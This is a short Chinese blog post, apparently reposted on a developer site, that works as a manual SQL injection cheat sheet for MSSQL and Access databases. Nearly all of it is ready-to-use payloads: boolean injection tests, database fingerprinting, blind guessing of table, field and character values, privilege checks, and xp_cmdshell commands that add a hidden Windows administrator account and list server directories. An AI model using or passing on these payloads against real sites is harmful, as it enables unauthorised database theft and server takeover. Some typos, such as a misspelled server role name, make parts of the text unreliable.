一些手工注入
2021/11/14 6:11:13
本文主要是介绍一些手工注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
sql注入产生的条件:
- 用户能够控制输入
- 原本程序执行的语句拼接了用户输入的数据
sql注入实质
通过把sql命令插入到web表单提交或者输入域名或页面请求的查询字符串,最终达到七篇服务器执行恶意sql命令
手工注入
判断是否有注入
;and 1=1 ;and 1=2
初步判断是否是mssql (微软的SQL Server数据库服务器)
;and user > 0
判断数据库系统
;and (select count(*) from sysobjects) > 0 mssql ;and (select count(*) from msysobjects) > 0 access
注入参数是字符
'and [查询条件] and "='
搜索时没有过滤参数的
'and [查询条件] and '%25'='
猜数据库
;and (select count(*) from [数据库铭]) > 0
猜字段
;and (select count(字段名) from [数据库名]) > 0
猜字段中记录长度
;and (select top 1 len(字段名) from [数据库名]) > 0
猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from [数据库名]) > 0
猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from [数据库]) > 0
测试权限结构(mssql)
;and 1 = (select IS_SRVROLEMEMBER('sysadmin'));-- ;and 1 = (select IS_SRVROLEMEMBER('serveradmin'));-- ;and 1 = (select IS_SRVROLEMEMBER('setiupadmin'));-- ;and 1 = (select IS_SRVROLEMEMBER('securityadmin'));-- ;and 1 = (select IS_SRVROLEMEMBER('diskadmin'));-- ;and 1 = (select IS_SRVROLEMEMBER('bulkadmin'));-- ;and 1 = (select IS_MEMBER('db_owner'));--
添加mssql和系统的账户
;exec master.dbo.sp_addlogin username;-- ;exec master.dbo.sp_password null , username,password;-- ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- ;exec master.dbo.xp_cmdshell 'net user username password /add';-- ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
遍历目录
;create table dirs(paths varchar(100),id int) ;insert dirs exec master.dbo.xp_dirtree 'c:\' ;and (select top 1 paths from dirs) > 0 ;and (select top 1 paths from dirs where paths not in ('上步得到的paths'))>)
这篇关于一些手工注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-15鸿蒙生态设备数量超8亿台
- 2024-05-13TiDB + ES:转转业财系统亿级数据存储优化实践
- 2024-05-09“2024鸿蒙零基础快速实战-仿抖音App开发(ArkTS版)”实战课程已上线
- 2024-05-09聊聊如何通过arthas-tunnel-server来远程管理所有需要arthas监控的应用
- 2024-05-09log4j2这么配就对了
- 2024-05-09nginx修改Content-Type
- 2024-05-09Redis多数据源,看这篇就够了
- 2024-05-09Google Chrome驱动程序 124.0.6367.62(正式版本)去哪下载?
- 2024-05-09有没有大佬知道这种数据应该怎么抓取呀?
- 2024-05-09这种运行结果里的10.100000001,怎么能最快改成10.1?